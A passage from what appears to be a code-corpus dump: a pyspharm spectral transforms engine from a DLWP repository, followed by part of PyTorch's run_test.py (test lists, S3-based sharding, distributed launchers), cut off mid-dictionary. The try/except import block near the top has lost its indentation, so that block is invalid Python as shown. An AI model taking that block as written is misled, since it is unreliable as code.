] | 1 | 2020-09-10T11:25:07.000Z | 2020-09-17T08:15:17.000Z | DLWP/barotropic/pyspharm_transforms.py | flashlxy/DLWP | 0fddfa3ee927fa298648fc3eb469f5a7a93e51e9 | [
"MIT"
] | 28 | 2019-05-03T06:02:07.000Z | 2022-01-28T20:57:18.000Z | """A spectral transforms engine using pyspharm."""
# (c) Copyright 2016 Andrew Dawson.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function) #noqa
import numpy as np
try:
from spharm import Spharmt, getspecindx, gaussian_lats_wts
except ImportError:
raise ImportError('pyspharm is required to use this transforms engine')
class TransformsEngine(object):
    """A spectral transforms engine based on pyspharm.

    Wraps a `spharm.Spharmt` object, exposing grid<->spectral transforms
    for scalar fields and vorticity/divergence <-> wind conversions,
    with input-shape errors re-raised with descriptive messages.
    """

    def __init__(self, nlon, nlat, truncation, radius=6371200.):
        """
        Initialize the spectral transforms engine.

        Arguments:

        * nlon: int
            Number of longitudes in the transform grid.

        * nlat: int
            Number of latitudes in the transform grid.

        * truncation: int
            The spectral truncation (triangular). This is the maximum
            number of spherical harmonic modes retained in the discrete
            truncation. More modes means higher resolution.

        * radius: float, optional
            Radius of the sphere in metres (default 6371200, Earth-like).
        """
        # NOTE(review): the transform is built with gridtype='regular',
        # but grid_latlon below returns Gaussian latitudes — confirm
        # which grid type is actually intended.
        self.sh = Spharmt(nlon, nlat, gridtype='regular', rsphere=radius)
        self.radius = radius
        self.nlon = nlon
        self.nlat = nlat
        self.truncation = truncation

    def vrtdiv_spec_from_uv_grid(self, u, v):
        """
        Compute spectral vorticity and divergence from grid u and v.
        """
        try:
            vrt, div = self.sh.getvrtdivspec(u, v, ntrunc=self.truncation)
        except ValueError:
            # Re-raise pyspharm's shape error with the expected dimensions.
            msg = ('u and v must be 2d or 3d arrays with shape ({y}, {x}) '
                   'or ({y}, {x}, :)'.format(y=self.nlat, x=self.nlon))
            raise ValueError(msg)
        return vrt, div

    def uv_grid_from_vrtdiv_spec(self, vrt, div):
        """
        Compute grid u and v from spectral vorticity and divergence.
        """
        try:
            u, v = self.sh.getuv(vrt, div)
        except ValueError:
            # Number of spectral coefficients in a triangular truncation T(n).
            nspec = (self.truncation + 1) * (self.truncation + 2) // 2
            msg = ('vrt and div must be 1d or 2d arrays with shape '
                   '(n) or (n, :) where n <= {}'.format(nspec))
            raise ValueError(msg)
        return u, v

    def spec_to_grid(self, scalar_spec):
        """
        Transform a scalar field from spectral to grid space.
        """
        try:
            scalar_grid = self.sh.spectogrd(scalar_spec)
        except ValueError:
            nspec = (self.truncation + 1) * (self.truncation + 2) // 2
            msg = ('scalar_spec must be a 1d or 2d array with shape '
                   '(n) or (n, :) where n <= {}'.format(nspec))
            raise ValueError(msg)
        return scalar_grid

    def grid_to_spec(self, scalar_grid):
        """
        Transform a scalar field from grid to spectral space.
        """
        try:
            scalar_spec = self.sh.grdtospec(scalar_grid,
                                            ntrunc=self.truncation)
        except ValueError:
            msg = ('scalar_grid must be a 2d or 3d array with shape '
                   '({y}, {x}) or ({y}, {x}, :)'.format(y=self.nlat,
                                                        x=self.nlon))
            raise ValueError(msg)
        return scalar_spec

    def grad_of_spec(self, scalar_spec):
        """
        Return zonal and meridional gradients of a spectral field.
        """
        try:
            dsdx, dsdy = self.sh.getgrad(scalar_spec)
        except ValueError:
            nspec = (self.truncation + 1) * (self.truncation + 2) // 2
            msg = ('scalar_spec must be a 1d or 2d array with shape '
                   '(n) or (n, :) where n <= {}'.format(nspec))
            raise ValueError(msg)
        return dsdx, dsdy

    @property
    def wavenumbers(self):
        """
        Wavenumbers corresponding to the spectral fields.
        """
        return getspecindx(self.truncation)

    @property
    def grid_latlon(self):
        """
        Return the latitude and longitude coordinate vectors of the
        model grid.
        """
        # Gaussian latitudes and a uniformly spaced longitude vector.
        lats, _ = gaussian_lats_wts(self.nlat)
        lons = np.arange(0., 360., 360. / self.nlon)
        return lats, lons
| 37.046875 | 75 | 0.58857 |
fab61397130183c213b0d01dc643c72b6361cbea | 41,770 | py | Python | test/run_test.py | deltabravozulu/pytorch | c6eef589971e45bbedacc7f65533d1b8f80a6895 | [
"Intel"
] | null | null | null | test/run_test.py | deltabravozulu/pytorch | c6eef589971e45bbedacc7f65533d1b8f80a6895 | [
"Intel"
] | 1 | 2021-04-12T19:49:08.000Z | 2021-04-12T19:49:08.000Z | test/run_test.py | deltabravozulu/pytorch | c6eef589971e45bbedacc7f65533d1b8f80a6895 | [
"Intel"
] | null | null | null | #!/usr/bin/env python
import argparse
import copy
from datetime import datetime
import json
import modulefinder
import os
import shutil
import signal
import subprocess
import sys
import tempfile
import torch
from torch.utils import cpp_extension
from torch.testing._internal.common_utils import TEST_WITH_ROCM, shell, set_cwd, FILE_SCHEMA
from torch.testing._internal.framework_utils import calculate_shards
import torch.distributed as dist
from typing import Dict, Optional, Tuple, List, Any
from typing_extensions import TypedDict
# Make the repo-root "tools" package importable so S3 test-time stats can be
# pulled; fall back gracefully (stats disabled) when boto3/tools are missing.
try:
    sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), ".."))
    from tools.stats_utils.s3_stat_parser import (get_previous_reports_for_branch, Report, HAVE_BOTO3)
except ImportError:
    print("Unable to import s3_stat_parser from tools. Running without S3 stats...")
    # Without the parser we cannot talk to S3 at all, regardless of boto3.
    HAVE_BOTO3 = False
# Master list of every test file (path relative to test/, without .py) that
# this runner knows about.  Selection options (--include/--exclude/--shard)
# all operate on this list.
TESTS = [
    'test_import_time',
    'test_public_bindings',
    'test_type_hints',
    'test_autograd',
    'benchmark_utils/test_benchmark_utils',
    'test_binary_ufuncs',
    'test_bundled_inputs',
    'test_complex',
    'test_cpp_api_parity',
    'test_cpp_extensions_aot_no_ninja',
    'test_cpp_extensions_aot_ninja',
    'test_cpp_extensions_jit',
    'distributed/test_c10d',
    'distributed/test_jit_c10d',
    'distributed/test_c10d_spawn',
    'test_cuda',
    'test_jit_cuda_fuser',
    'test_cuda_primary_ctx',
    'test_dataloader',
    'test_datapipe',
    'distributed/test_data_parallel',
    'distributed/test_distributed_fork',
    'distributed/test_distributed_spawn',
    'distributions/test_constraints',
    'distributions/test_distributions',
    'test_dispatch',
    'test_expecttest',
    'test_foreach',
    'test_indexing',
    'test_jit',
    'test_linalg',
    'test_logging',
    'test_mkldnn',
    'test_multiprocessing',
    'test_multiprocessing_spawn',
    'distributed/test_nccl',
    'test_native_functions',
    'test_numba_integration',
    'test_nn',
    'test_ops',
    'test_optim',
    'test_pytree',
    'test_mobile_optimizer',
    'test_set_default_mobile_cpu_allocator',
    'test_xnnpack_integration',
    'test_vulkan',
    'test_sparse',
    'test_quantization',
    'test_pruning_op',
    'test_spectral_ops',
    'test_serialization',
    'test_shape_ops',
    'test_show_pickle',
    'test_sort_and_select',
    'test_tensor_creation_ops',
    'test_testing',
    'test_torch',
    'test_type_info',
    'test_unary_ufuncs',
    'test_utils',
    'test_view_ops',
    'test_vmap',
    'test_namedtuple_return_api',
    'test_numpy_interop',
    'test_jit_profiling',
    'test_jit_legacy',
    'test_jit_fuser_legacy',
    'test_tensorboard',
    'test_namedtensor',
    'test_reductions',
    'test_type_promotion',
    'test_jit_disabled',
    'test_function_schema',
    'test_op_aliases',
    'test_overrides',
    'test_jit_fuser_te',
    'test_tensorexpr',
    'test_tensorexpr_pybind',
    'test_openmp',
    'test_profiler',
    "distributed/test_launcher",
    'distributed/nn/jit/test_instantiator',
    'distributed/rpc/test_faulty_agent',
    'distributed/rpc/test_process_group_agent',
    'distributed/rpc/cuda/test_process_group_agent',
    'distributed/rpc/test_tensorpipe_agent',
    'distributed/rpc/cuda/test_tensorpipe_agent',
    'test_determination',
    'test_futures',
    'test_fx',
    'test_fx_experimental',
    'test_functional_autograd_benchmark',
    'test_package',
    'test_license',
    'distributed/pipeline/sync/skip/test_api',
    'distributed/pipeline/sync/skip/test_gpipe',
    'distributed/pipeline/sync/skip/test_inspect_skip_layout',
    'distributed/pipeline/sync/skip/test_leak',
    'distributed/pipeline/sync/skip/test_portal',
    'distributed/pipeline/sync/skip/test_stash_pop',
    'distributed/pipeline/sync/skip/test_tracker',
    'distributed/pipeline/sync/skip/test_verify_skippables',
    'distributed/pipeline/sync/test_balance',
    'distributed/pipeline/sync/test_bugs',
    'distributed/pipeline/sync/test_checkpoint',
    'distributed/pipeline/sync/test_copy',
    'distributed/pipeline/sync/test_deferred_batch_norm',
    'distributed/pipeline/sync/test_dependency',
    'distributed/pipeline/sync/test_inplace',
    'distributed/pipeline/sync/test_microbatch',
    'distributed/pipeline/sync/test_phony',
    'distributed/pipeline/sync/test_pipe',
    'distributed/pipeline/sync/test_pipeline',
    'distributed/pipeline/sync/test_stream',
    'distributed/pipeline/sync/test_transparency',
    'distributed/pipeline/sync/test_worker',
    'distributed/optim/test_zero_redundancy_optimizer',
]
# Tests need to be run with pytest.
# run_test() forces the pytest launcher for these modules regardless of -pt.
USE_PYTEST_LIST = [
    'distributed/pipeline/sync/skip/test_api',
    'distributed/pipeline/sync/skip/test_gpipe',
    'distributed/pipeline/sync/skip/test_inspect_skip_layout',
    'distributed/pipeline/sync/skip/test_leak',
    'distributed/pipeline/sync/skip/test_portal',
    'distributed/pipeline/sync/skip/test_stash_pop',
    'distributed/pipeline/sync/skip/test_tracker',
    'distributed/pipeline/sync/skip/test_verify_skippables',
    'distributed/pipeline/sync/test_balance',
    'distributed/pipeline/sync/test_bugs',
    'distributed/pipeline/sync/test_checkpoint',
    'distributed/pipeline/sync/test_copy',
    'distributed/pipeline/sync/test_deferred_batch_norm',
    'distributed/pipeline/sync/test_dependency',
    'distributed/pipeline/sync/test_inplace',
    'distributed/pipeline/sync/test_microbatch',
    'distributed/pipeline/sync/test_phony',
    'distributed/pipeline/sync/test_pipe',
    'distributed/pipeline/sync/test_pipeline',
    'distributed/pipeline/sync/test_stream',
    'distributed/pipeline/sync/test_transparency',
    'distributed/pipeline/sync/test_worker',
    'distributions/test_constraints',
    'distributions/test_transforms',
    'distributions/test_utils',
    'test_typing',
    "distributed/elastic/events/lib_test",
]
# Tests skipped on Windows (unless --ignore-win-blocklist is passed).
WINDOWS_BLOCKLIST = [
    'distributed/nn/jit/test_instantiator',
    'distributed/rpc/test_faulty_agent',
    'distributed/rpc/test_process_group_agent',
    'distributed/rpc/cuda/test_process_group_agent',
    'distributed/rpc/test_tensorpipe_agent',
    'distributed/rpc/cuda/test_tensorpipe_agent',
    'distributed/test_distributed_fork',
    'distributed/pipeline/sync/skip/test_api',
    'distributed/pipeline/sync/skip/test_gpipe',
    'distributed/pipeline/sync/skip/test_inspect_skip_layout',
    'distributed/pipeline/sync/skip/test_leak',
    'distributed/pipeline/sync/skip/test_portal',
    'distributed/pipeline/sync/skip/test_stash_pop',
    'distributed/pipeline/sync/skip/test_tracker',
    'distributed/pipeline/sync/skip/test_verify_skippables',
    'distributed/pipeline/sync/test_balance',
    'distributed/pipeline/sync/test_bugs',
    'distributed/pipeline/sync/test_checkpoint',
    'distributed/pipeline/sync/test_copy',
    'distributed/pipeline/sync/test_deferred_batch_norm',
    'distributed/pipeline/sync/test_dependency',
    'distributed/pipeline/sync/test_inplace',
    'distributed/pipeline/sync/test_microbatch',
    'distributed/pipeline/sync/test_phony',
    'distributed/pipeline/sync/test_pipe',
    'distributed/pipeline/sync/test_pipeline',
    'distributed/pipeline/sync/test_stream',
    'distributed/pipeline/sync/test_transparency',
    'distributed/pipeline/sync/test_worker',
    'distributed/optim/test_zero_redundancy_optimizer',
]
# Tests skipped when running under ROCm (TEST_WITH_ROCM).
ROCM_BLOCKLIST = [
    'distributed/nn/jit/test_instantiator',
    'distributed/rpc/test_faulty_agent',
    'distributed/rpc/test_process_group_agent',
    'distributed/rpc/cuda/test_process_group_agent',
    'distributed/rpc/test_tensorpipe_agent',
    'distributed/rpc/cuda/test_tensorpipe_agent',
    'test_determination',
    'test_multiprocessing',
    'test_jit_legacy',
    'test_type_hints',
    'test_openmp',
]
# Tests from which run_test() strips any --run-parallel flag (they must run
# serially); every distributed/ test is included automatically.
RUN_PARALLEL_BLOCKLIST = [
    'test_cpp_extensions_jit',
    'test_expecttest',
    'test_jit_disabled',
    'test_mobile_optimizer',
    'test_multiprocessing',
    'test_multiprocessing_spawn',
    'test_namedtuple_return_api',
    'test_overrides',
    'test_show_pickle',
    'test_tensorexpr',
    'test_cuda_primary_ctx',
] + [test for test in TESTS if test.startswith('distributed/')]

# Tests that cannot run under coverage on Windows (see run_test()).
WINDOWS_COVERAGE_BLOCKLIST = [
]
# These tests are slow enough that it's worth calculating whether the patch
# touched any related files first. This list was manually generated, but for every
# run with --determine-from, we use another generated list based on this one and the
# previous test stats.
TARGET_DET_LIST = [
    'distributions/test_distributions',
    'test_nn',
    'test_autograd',
    'test_cpp_extensions_jit',
    'test_jit_legacy',
    'test_dataloader',
    'test_overrides',
    'test_linalg',
    'test_jit',
    'test_jit_profiling',
    'test_torch',
    # BUGFIX: a missing trailing comma here previously concatenated the next
    # two entries into the bogus name 'test_binary_ufuncstest_numpy_interop',
    # silently removing both tests from determination.
    'test_binary_ufuncs',
    'test_numpy_interop',
    'test_reductions',
    'test_shape_ops',
    'test_sort_and_select',
    'test_testing',
    'test_view_ops',
    'distributed/nn/jit/test_instantiator',
    'distributed/test_distributed_fork',
    'distributed/rpc/test_process_group_agent',
    'distributed/rpc/cuda/test_process_group_agent',
    'distributed/rpc/test_tensorpipe_agent',
    'distributed/rpc/cuda/test_tensorpipe_agent',
    'distributed/algorithms/ddp_comm_hooks/test_ddp_hooks',
    'distributed/test_distributed_spawn',
    'test_cuda',
    'test_cuda_primary_ctx',
    'test_cpp_extensions_aot_ninja',
    'test_cpp_extensions_aot_no_ninja',
    'test_serialization',
    'test_optim',
    'test_utils',
    'test_multiprocessing',
    'test_tensorboard',
    'distributed/test_c10d',
    'distributed/test_jit_c10d',
    'distributed/test_c10d_spawn',
    'test_quantization',
    'test_pruning_op',
    'test_determination',
    'test_futures',
    'distributed/pipeline/sync/skip/test_api',
    'distributed/pipeline/sync/skip/test_gpipe',
    'distributed/pipeline/sync/skip/test_inspect_skip_layout',
    'distributed/pipeline/sync/skip/test_leak',
    'distributed/pipeline/sync/skip/test_portal',
    'distributed/pipeline/sync/skip/test_stash_pop',
    'distributed/pipeline/sync/skip/test_tracker',
    'distributed/pipeline/sync/skip/test_verify_skippables',
    'distributed/pipeline/sync/test_balance',
    'distributed/pipeline/sync/test_bugs',
    'distributed/pipeline/sync/test_checkpoint',
    'distributed/pipeline/sync/test_copy',
    'distributed/pipeline/sync/test_deferred_batch_norm',
    'distributed/pipeline/sync/test_dependency',
    'distributed/pipeline/sync/test_inplace',
    'distributed/pipeline/sync/test_microbatch',
    'distributed/pipeline/sync/test_phony',
    'distributed/pipeline/sync/test_pipe',
    'distributed/pipeline/sync/test_pipeline',
    'distributed/pipeline/sync/test_stream',
    'distributed/pipeline/sync/test_transparency',
    'distributed/pipeline/sync/test_worker',
]
# the JSON file to store the S3 test stats
TEST_TIMES_FILE = '.pytorch-test-times'

# if a test file takes longer than 5 min, we add it to TARGET_DET_LIST
SLOW_TEST_THRESHOLD = 300

# Cache for get_dep_modules(): test name -> set of module names it imports.
_DEP_MODULES_CACHE: Dict[str, set] = {}

# Backend name -> extra environment variables used by test_distributed().
# Populated only for the backends compiled into this torch build.
DISTRIBUTED_TESTS_CONFIG = {}


if dist.is_available():
    DISTRIBUTED_TESTS_CONFIG['test'] = {
        'WORLD_SIZE': '1'
    }
    if not TEST_WITH_ROCM and dist.is_mpi_available():
        DISTRIBUTED_TESTS_CONFIG['mpi'] = {
            'WORLD_SIZE': '3',
            'TEST_REPORT_SOURCE_OVERRIDE': 'dist-mpi'
        }
    if dist.is_nccl_available():
        DISTRIBUTED_TESTS_CONFIG['nccl'] = {
            'WORLD_SIZE': '2' if torch.cuda.device_count() == 2 else '3',
            'TEST_REPORT_SOURCE_OVERRIDE': 'dist-nccl'
        }
    if dist.is_gloo_available():
        DISTRIBUTED_TESTS_CONFIG['gloo'] = {
            'WORLD_SIZE': '2' if torch.cuda.device_count() == 2 else '3',
            'TEST_REPORT_SOURCE_OVERRIDE': 'dist-gloo'
        }

# https://stackoverflow.com/questions/2549939/get-signal-names-from-numbers-in-python
# Maps a signal number to its symbolic name (e.g. 11 -> 'SIGSEGV').
SIGNALS_TO_NAMES_DICT = {getattr(signal, n): n for n in dir(signal)
                         if n.startswith('SIG') and '_' not in n}

CPP_EXTENSIONS_ERROR = """
Ninja (https://ninja-build.org) is required for some of the C++ extensions
tests, but it could not be found. Install ninja with `pip install ninja`
or `conda install ninja`. Alternatively, disable said tests with
`run_test.py --exclude test_cpp_extensions_aot_ninja test_cpp_extensions_jit`.
"""

PYTORCH_COLLECT_COVERAGE = bool(os.environ.get("PYTORCH_COLLECT_COVERAGE"))

# Tests that exercise a specific JIT executor configuration; excluded when
# --exclude-jit-executor is passed.
JIT_EXECUTOR_TESTS = [
    'test_jit_cuda_fuser',
    'test_jit_profiling',
    'test_jit_legacy',
    'test_jit_fuser_legacy',
]
def print_to_stderr(message):
    """Write *message* (stringified) and a newline to standard error."""
    sys.stderr.write('{}\n'.format(message))
# Convert something like pytorch_windows_vs2019_py36_cuda10.1_build to pytorch_windows_vs2019_py36_cuda10.1
def get_stripped_CI_job() -> str:
    """Return CIRCLE_JOB with trailing digits and a trailing
    _slow_test/_test/_build suffix (if any) removed."""
    job = os.environ.get("CIRCLE_JOB", "").rstrip('0123456789')
    # Longest suffix first, so '_slow_test' is not mistaken for '_test'.
    for suffix in ('_slow_test', '_test', '_build'):
        if job.endswith(suffix):
            job = job[:-len(suffix)]
            break
    return job
def calculate_job_times(reports: List["Report"]) -> Dict[str, float]:
    """Average per-test-file durations across a list of S3 reports.

    Returns a mapping of test file name -> mean total_seconds across all
    reports that mention it.
    """
    # test file name -> (running average, number of samples folded in)
    running: Dict[str, Tuple[float, int]] = dict()
    for report in reports:
        assert report.get('format_version') == 2, "S3 format currently handled is version 2 only"
        for name, test_file in report['files'].items():
            seconds = test_file['total_seconds']
            if name not in running:
                running[name] = (seconds, 1)
            else:
                prev_avg, prev_count = running[name]
                count = prev_count + 1
                # Incremental mean update, identical to (sum / count).
                running[name] = ((prev_avg * prev_count + seconds) / count, count)
    # The two cpp_extensions_aot Python jobs (ninja / no_ninja) share the
    # single test_cpp_extensions_aot.py file, so mirror its stats under both
    # job names to ease later lookups.
    if 'test_cpp_extensions_aot' in running:
        running['test_cpp_extensions_aot_ninja'] = running['test_cpp_extensions_aot']
        running['test_cpp_extensions_aot_no_ninja'] = running['test_cpp_extensions_aot']
    return {name: avg for name, (avg, _) in running.items()}
def pull_job_times_from_S3() -> Dict[str, float]:
    """Fetch nightly reports for this CI job from S3 and return averaged
    per-test-file times (empty dict when boto3/reports are unavailable)."""
    if not HAVE_BOTO3:
        print('Uh oh, boto3 is not found. Either it is not installed or we failed to import s3_stat_parser.')
        print('If not installed, please install boto3 for automatic sharding and test categorization.')
        s3_reports: List["Report"] = []
    else:
        s3_reports = get_previous_reports_for_branch('origin/nightly', get_stripped_CI_job())

    if len(s3_reports) == 0:
        print('Gathered no reports from S3. Please proceed without them.')
        return dict()

    return calculate_job_times(s3_reports)
def get_past_job_times() -> Dict[str, float]:
    """Return per-test-file times for the current commit and CI job.

    Uses the local cache file (TEST_TIMES_FILE) when its recorded commit and
    CI job match the current ones; otherwise re-pulls stats from S3 and
    rewrites the cache.
    """
    if os.path.exists(TEST_TIMES_FILE):
        with open(TEST_TIMES_FILE) as file:
            test_times_json: JobTimeJSON = json.load(file)

        # Compare the cache's provenance against the current checkout/job.
        curr_commit = subprocess.check_output(['git', 'rev-parse', 'HEAD'], encoding="ascii").strip()
        file_commit = test_times_json.get('commit', '')
        curr_ci_job = get_stripped_CI_job()
        file_ci_job = test_times_json.get('CIRCLE_JOB', 'N/A')
        if curr_commit != file_commit:
            print(f'Current test times file is from different commit {file_commit}.')
        elif curr_ci_job != file_ci_job:
            print(f'Current test times file is for different CI job {file_ci_job}.')
        else:
            print(f'Found stats for current commit: {curr_commit} and job: {curr_ci_job}. Proceeding with those values.')
            return test_times_json.get('job_times', {})

        # Found file, but commit or CI job in JSON doesn't match
        print(f'Overwriting current file with stats based on current commit: {curr_commit} and CI job: {curr_ci_job}')

    # Cache miss (or stale cache): refresh from S3 and persist.
    job_times = pull_job_times_from_S3()
    print(f'Exporting S3 test stats to {TEST_TIMES_FILE}.')
    export_S3_test_times(TEST_TIMES_FILE, job_times)

    return job_times
class JobTimeJSON(TypedDict):
    """Schema of the on-disk test-times cache (TEST_TIMES_FILE).

    Mirrors what get_job_times_json() writes and get_past_job_times() reads.
    """
    commit: str
    # FIX: this key was missing from the TypedDict even though
    # get_job_times_json() writes it and get_past_job_times() reads it.
    CIRCLE_JOB: str
    job_times: Dict[str, float]
def get_job_times_json(job_times: Dict[str, float]) -> JobTimeJSON:
    """Bundle *job_times* with the current commit SHA and CI job name,
    in the shape persisted to TEST_TIMES_FILE."""
    current_commit = subprocess.check_output(
        ['git', 'rev-parse', 'HEAD'], encoding="ascii").strip()
    return {
        'commit': current_commit,
        'CIRCLE_JOB': get_stripped_CI_job(),
        'job_times': job_times,
    }
def get_shard(which_shard: int, num_shards: int, tests: List[str]) -> List[str]:
    """Return the sublist of *tests* assigned to 1-based shard *which_shard*.

    Uses past job times to balance shards; falls back to a simple
    round-robin split when no stats are available.
    """
    job_times = get_past_job_times()

    if len(job_times) == 0:
        # Got no stats from S3, returning early to save runtime
        print('Gathered no stats from S3. Proceeding with default sharding plan.')
        return tests[which_shard - 1 :: num_shards]

    all_shards = calculate_shards(num_shards, tests, job_times)
    _, shard_tests = all_shards[which_shard - 1]
    return shard_tests
def get_slow_tests_based_on_S3() -> List[str]:
    """Return tests whose past runtime exceeds SLOW_TEST_THRESHOLD and that
    are not already in the manually curated TARGET_DET_LIST."""
    job_times = get_past_job_times()

    if len(job_times) == 0:
        # Got no stats from S3, returning early to save runtime
        print('Gathered no stats from S3. No new slow tests calculated.')
        return []

    return [
        test for test in TESTS
        if test not in TARGET_DET_LIST
        and job_times.get(test, 0) > SLOW_TEST_THRESHOLD
    ]
def get_executable_command(options, allow_pytest, disable_coverage=False):
    """Build the interpreter prefix used to launch a test file.

    Returns a coverage runner when --coverage is on (and not disabled for
    this test), otherwise the current interpreter; appends `-m pytest`
    when pytest was requested and is allowed for this test.
    """
    if options.coverage and not disable_coverage:
        executable = ['coverage', 'run', '--parallel-mode', '--source=torch']
    else:
        executable = [sys.executable]
    if options.pytest:
        if not allow_pytest:
            print_to_stderr('Pytest cannot be used for this test. Falling back to unittest.')
        else:
            executable += ['-m', 'pytest']
    return executable
def run_test(test_module, test_directory, options, launcher_cmd=None, extra_unittest_args=None):
    """Launch a single test file as a subprocess and return its exit code.

    Assembles the command as: [launcher_cmd] + interpreter prefix +
    `<test_module>.py` + unittest/pytest arguments.
    """
    test_args = options.additional_unittest_args.copy()
    if options.verbose:
        # -v / -vv / ... (pytest also understands repeated -v)
        test_args.append('-' + 'v' * options.verbose)
    if test_module in RUN_PARALLEL_BLOCKLIST:
        test_args = [a for a in test_args if not a.startswith('--run-parallel')]
    if extra_unittest_args:
        assert isinstance(extra_unittest_args, list)
        test_args.extend(extra_unittest_args)

    # If using pytest, replace -f with equivalent -x
    if options.pytest:
        test_args = ['-x' if a == '-f' else a for a in test_args]

    # Can't call `python -m unittest test_*` here because it doesn't run code
    # in `if __name__ == '__main__': `. So call `python test_*.py` instead.
    argv = [test_module + '.py'] + test_args

    # Multiprocessing related tests cannot run with coverage.
    # Tracking issue: https://github.com/pytorch/pytorch/issues/50661
    no_coverage = sys.platform == 'win32' and test_module in WINDOWS_COVERAGE_BLOCKLIST

    # Extra arguments are not supported with pytest
    executable = get_executable_command(options, allow_pytest=not extra_unittest_args,
                                        disable_coverage=no_coverage)

    command = (launcher_cmd or []) + executable + argv
    print_to_stderr('Executing {} ... [{}]'.format(command, datetime.now()))
    return shell(command, test_directory)
def test_cuda_primary_ctx(test_module, test_directory, options):
    """Run the CUDA primary-context tests, isolating each test in a subprocess."""
    subprocess_args = ['--subprocess']
    return run_test(test_module, test_directory, options,
                    extra_unittest_args=subprocess_args)
def _test_cpp_extensions_aot(test_module, test_directory, options, use_ninja):
    """Build the ahead-of-time C++ extension test modules, install them into
    a local directory, put that on PYTHONPATH, and run the Python tests.

    Returns a non-zero exit code as soon as any build or test step fails.
    """
    if use_ninja:
        try:
            cpp_extension.verify_ninja_availability()
        except RuntimeError:
            print(CPP_EXTENSIONS_ERROR)
            return 1

    # Wipe the build folder, if it exists already
    cpp_extensions_test_dir = os.path.join(test_directory, 'cpp_extensions')
    cpp_extensions_test_build_dir = os.path.join(cpp_extensions_test_dir, 'build')
    if os.path.exists(cpp_extensions_test_build_dir):
        shutil.rmtree(cpp_extensions_test_build_dir)

    # Build the test cpp extensions modules
    shell_env = os.environ.copy()
    shell_env['USE_NINJA'] = str(1 if use_ninja else 0)
    cmd = [sys.executable, 'setup.py', 'install', '--root', './install']
    return_code = shell(cmd, cwd=cpp_extensions_test_dir, env=shell_env)
    if return_code != 0:
        return return_code
    if sys.platform != 'win32':
        # Extra build that checks extensions without a Python ABI suffix.
        return_code = shell(cmd,
                            cwd=os.path.join(cpp_extensions_test_dir, 'no_python_abi_suffix_test'),
                            env=shell_env)
        if return_code != 0:
            return return_code

    # "install" the test modules and run tests
    python_path = os.environ.get('PYTHONPATH', '')
    try:
        cpp_extensions = os.path.join(test_directory, 'cpp_extensions')
        install_directory = ''
        # install directory is the one that is named site-packages
        for root, directories, _ in os.walk(os.path.join(cpp_extensions, 'install')):
            for directory in directories:
                if '-packages' in directory:
                    install_directory = os.path.join(root, directory)
        assert install_directory, 'install_directory must not be empty'
        os.environ['PYTHONPATH'] = os.pathsep.join([install_directory, python_path])
        return run_test(test_module, test_directory, options)
    finally:
        # Always restore the caller's PYTHONPATH, even if the test run raised.
        os.environ['PYTHONPATH'] = python_path
def test_cpp_extensions_aot_ninja(test_module, test_directory, options):
    """AOT C++ extension tests, built with ninja."""
    return _test_cpp_extensions_aot('test_cpp_extensions_aot',
                                    test_directory, options, use_ninja=True)
def test_cpp_extensions_aot_no_ninja(test_module, test_directory, options):
    """AOT C++ extension tests, built with plain setuptools (no ninja)."""
    return _test_cpp_extensions_aot('test_cpp_extensions_aot',
                                    test_directory, options, use_ninja=False)
def test_distributed(test_module, test_directory, options):
    """Run a distributed test module once per (backend, init_method) combo.

    Backends come from DISTRIBUTED_TESTS_CONFIG; each combination gets a
    fresh temp dir and communicates its configuration to the child process
    through environment variables (TEMP_DIR, BACKEND, INIT_METHOD, ...).
    Returns the first non-zero exit code, or 0 if everything passed.
    """
    mpi_available = subprocess.call('command -v mpiexec', shell=True) == 0
    if options.verbose and not mpi_available:
        print_to_stderr(
            'MPI not available -- MPI backend tests will be skipped')
    config = DISTRIBUTED_TESTS_CONFIG
    for backend, env_vars in config.items():
        if sys.platform == 'win32' and backend != 'gloo':
            continue
        if backend == 'mpi' and not mpi_available:
            continue
        # NOTE(review): iterating a set literal relies on CPython's hash
        # ordering for bools -- a tuple would make the order explicit.
        for with_init_file in {True, False}:
            if sys.platform == 'win32' and not with_init_file:
                continue
            tmp_dir = tempfile.mkdtemp()
            if options.verbose:
                init_str = "with {} init_method"
                with_init = init_str.format("file" if with_init_file else "env")
                print_to_stderr(
                    'Running distributed tests for the {} backend {}'.format(
                        backend, with_init))
            # Child processes read their configuration from the environment.
            os.environ['TEMP_DIR'] = tmp_dir
            os.environ['BACKEND'] = backend
            os.environ['INIT_METHOD'] = 'env://'
            os.environ.update(env_vars)
            if with_init_file:
                if test_module in ["test_distributed_fork", "test_distributed_spawn"]:
                    init_method = f'{FILE_SCHEMA}{tmp_dir}/'
                else:
                    init_method = f'{FILE_SCHEMA}{tmp_dir}/shared_init_file'
                os.environ['INIT_METHOD'] = init_method
            try:
                os.mkdir(os.path.join(tmp_dir, 'barrier'))
                os.mkdir(os.path.join(tmp_dir, 'test_dir'))
                if backend == 'mpi':
                    # test mpiexec for --noprefix option
                    with open(os.devnull, 'w') as devnull:
                        allowrunasroot_opt = '--allow-run-as-root' if subprocess.call(
                            'mpiexec --allow-run-as-root -n 1 bash -c ""', shell=True,
                            stdout=devnull, stderr=subprocess.STDOUT) == 0 else ''
                        noprefix_opt = '--noprefix' if subprocess.call(
                            f'mpiexec {allowrunasroot_opt} -n 1 --noprefix bash -c ""', shell=True,
                            stdout=devnull, stderr=subprocess.STDOUT) == 0 else ''
                    mpiexec = ['mpiexec', '-n', '3', noprefix_opt, allowrunasroot_opt]
                    return_code = run_test(test_module, test_directory, options,
                                           launcher_cmd=mpiexec)
                else:
                    return_code = run_test(test_module, test_directory, options)
                if return_code != 0:
                    return return_code
            finally:
                # Clean up the per-combination temp dir even on failure.
                shutil.rmtree(tmp_dir)
    return 0
# Dispatch table: test modules that need bespoke launch logic instead of the
# generic run_test() (see run_test_module()).
CUSTOM_HANDLERS = {
    'test_cuda_primary_ctx': test_cuda_primary_ctx,
    'test_cpp_extensions_aot_no_ninja': test_cpp_extensions_aot_no_ninja,
    'test_cpp_extensions_aot_ninja': test_cpp_extensions_aot_ninja,
    'distributed/test_distributed_fork': test_distributed,
